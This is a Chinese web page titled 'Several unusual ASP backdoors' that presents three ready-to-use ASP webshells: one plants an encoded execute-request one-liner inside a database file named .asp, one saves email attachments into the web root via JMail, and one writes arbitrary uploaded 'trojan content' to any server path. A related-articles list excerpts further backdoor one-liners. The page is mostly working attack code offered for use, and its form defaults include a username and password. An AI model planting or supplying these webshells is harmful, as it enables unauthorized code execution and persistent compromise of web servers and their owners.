几种另类的ASP后门

<% 
'code by netpatch
dim dbfile,sql 
db="netpatch.asp"
dbfile=server.MapPath(db)

set ydb=server.CreateObject("ADOX.Catalog") 
ydb.Create "Provider=Microsoft.Jet.OLEDB.4.0;Data Source=" & dbfile 
set ydb=nothing 
if err.number=0 then 
Response.Write dbfile & " 创建成功<br> " 
else 
Response.Write "创建失败,原因: " & err.description 
Response.End 
end if

Set Conn = Server.CreateObject("ADODB.Connection") 
Conn.Open "Provider=Microsoft.Jet.OLEDB.4.0; Data Source=" & dbfile

sql="CREATE TABLE fdata([data] Memo)" 
conn.execute(sql)

Set rs = CreateObject("ADODB.RecordSet") 
rs.Open "FData", conn, 1, 3 
rs.addnew 
rs("data")="┼攠數畣整爠煥敵瑳∨≮┩>"   '(注释记得去掉!一句话后门 execute request(“n”))
rs.update

%>

用Jmail写文件进硬盘

<% 
    'codz by kEvin1986 [S4T]
    User=Request.Form("User")
    Pass=Request.Form("Pass")
    Popserver=Request.Form("Popserver")

if User<>"" and Pass<>"" and Popserver<>"" then
        Set objmail = CreateObject( "JMail.POP3" )
        objmail.Connect User, Pass, Popserver

set objmsg=CreateObject("jmail.message")
        Set objmsg = objmail.Messages.item(1) 
        separator = ", "
        response.write "Attachment Name is: " & SaveAtta & "<br>"
        objmail.Disconnect
    End if

Function SaveAtta()
        Set Attachments = objmsg.Attachments
        separator = ", "
        response.write "The size of this Attachment is: " & objmsg.size & "<br>"
        For i = 0 To Attachments.Count - 1
        If i = Attachments.Count - 1 Then
              separator = ""
        End If

Set Theatta = Attachments(i)
        response.write Theatta.Name 
        Theatta.SaveToFile(Server.Mappath(".") & "\" & Theatta.Name)
        Response.write "Oh!Hey Guy.....That's OK!"
        Next
    End Function
%>

<Html>
<Head>
<Title>Jmail Save File Shell</Title>
</Head>
<Body>
<Center>
<Form Method="POST">
User: <input name="User" type=text value="kevin1986"><br>
Pass: <input name="Pass" type=text value="1986lovinghuan"><br>
POP3: <input name="Popserver" type=text value="pop.163.com"><br>
<input type=submit value="Get the Attachments Of the First Mail">
</Form>
</Center>
</Body>
</Html>

利用xml写马

<%on error resume next%>
<form id="form1" name="form1" method="post" action=''''>
<p>木马内容</p>
<p><textarea name="flashboy" cols="80" rows="10"></textarea></p>
<p>路径</p>  
<p><input name="textfield" type="text" size="50" /></p>
<p><input type="submit" name="Submit" value="提交" /></p></form>
<p><%Response.write "本文件绝对路径"%>
  <%=server.mappath(Request.ServerVariables("SCRIPT_NAME"))%></p>
<%
dim xmlString
dim xmlDoc
xmlString= Request("flashboy")
set xmlDoc = server.createObject("Msxml2.DOMDocument")
xmlDoc.loadXml(xmlString)
f=Request("textfield")
xmlDoc.save(f)
set xmlDoc=nothing
%>

(0)

相关推荐

  • 几种另类的ASP后门

    <%  'code by netpatch dim dbfile,sql  db="netpatch.asp" dbfile=server.MapPath(db) set ydb=server.CreateObject("ADOX.Catalog")  ydb.Create "Provider=Microsoft.Jet.OLEDB.4.0;Data Source=" & dbfile  set ydb=nothing  if er

  • 七步倒┈→专用asp后门

    <html> <head> <title>七步倒┈→专用asp后门</title> </head> </html> <%dim objFSO%> <%dim fdata%> <%dim objCountFile%> <%on error resume next%> <%Set objFSO = Server.CreateObject("Scripting.FileSyst

  • 三种方法解决ASP.NET Core 6中的依赖项

    依赖性注入是一种技术,它允许我们注入一个特定类的依赖对象,而不是直接创建这些实例. 使用依赖注入的好处显而易见,它通过放松模块间的耦合,来增强系统的可维护性和可测试性. 依赖注入允许我们修改具体实现,而不必改变依赖于它们的依赖类型. ASP.NET Core 很重视依赖注入技术.ASP.NET Core 中内置的依赖注入提供功能模块,并不像 StructureMap 和 Ninject 等IoC(控制反转)容器那样功能丰富,但它速度快,易于配置,而且易于使用.我们可以使用它在 ASP.NET C

  • 新型ASP后门源代码分析

    本是为了逃LAKER2兄 查ASP木马程序的  现在已经挑战成功,已经加为检查对象了.公布出代码给冰点的朋友使使,希望大家喜欢! 利用的是ADOX.Catalog组件 复制代码 代码如下: <%    'code by netpatch   dim dbfile,sql    db="netpatch.asp"   dbfile=server.MapPath(db) set ydb=server.CreateObject("ADOX.Catalog")   

  • 利用wsc制作的一个asp后门

    <?xml version="1.0" encoding="gb2312" standalone="yes"?> <?component error="true" debug="true"?> <package> <component id="haiyangtop"> <public> <method name="

  • sql server中批量插入与更新两种解决方案分享(asp.net)

    若只是需要大批量插入数据使用bcp是最好的,若同时需要插入.删除.更新建议使用SqlDataAdapter我测试过有很高的效率,一般情况下这两种就满足需求了 bcp方式 复制代码 代码如下: /// <summary> /// 大批量插入数据(2000每批次) /// 已采用整体事物控制 /// </summary> /// <param name="connString">数据库链接字符串</param> /// <param n

  • 一个较新的ASP后门服务端实现代码

    今天重新研究了下VB里面的ScriptControl组件,发现asp里面也能调用.研究了下方法,后来和lcx讨论了下.得到了如下代码,在此感谢前辈的指点,呵呵. 代码很简单,我就不多做解释了,以免有人骂我装. 复制代码 代码如下: <% Set o = Server.CreateObject("ScriptControl") o.language = "vbscript" o.addcode(Request("SubCode")) '参数S

  • 隐蔽的ASP后门 大家可以查看下

    复制代码 代码如下: <%if request.QueryString("action")="log" then a=Request.TotalBytes:if a Then b="adodb.stream":Set c=Createobject(b):c.Type=1:c.Open:c.Write Request.BinaryRead(a):c.Position=0:d=c.Read:e=chrB(13)&chrB(10):f=I

  • 最小asp后门程序

    首先在asp文件中写如<%execute request("value")%>代码如果想要隐藏,就要加入一些if判断语句,即可然后在本地写个表单 复制代码 代码如下: <form action=http://***.com/jb51.asp method=post> <textarea name=value cols=120 rows=10 width=45> set lP=server.createObject("Adodb.Stream

  • IE浏览器的四种另类技巧

    IE几乎是各位菜鸟.大虾上网时的首选浏览器,有关它的常规使用技巧,相信各位早已是耳熟能详了.不过笔者始终认为,只要你足够用心.细心,就一定会不断"挖掘"出IE新的使用技巧来.不信,就来看看下 面的几则新鲜用法吧,相信会让各位有耳目一新之感! 1.寻找失落的IE启动按钮 正常情况下,IE浏览器的快速启动按钮会在系统任务栏中"安家落户",可是一旦操作不小心,往往会导致IE浏览器的快速启动按钮在任务栏中"消失".那么你面对IE启动按钮从系统任务栏中消失

随机推荐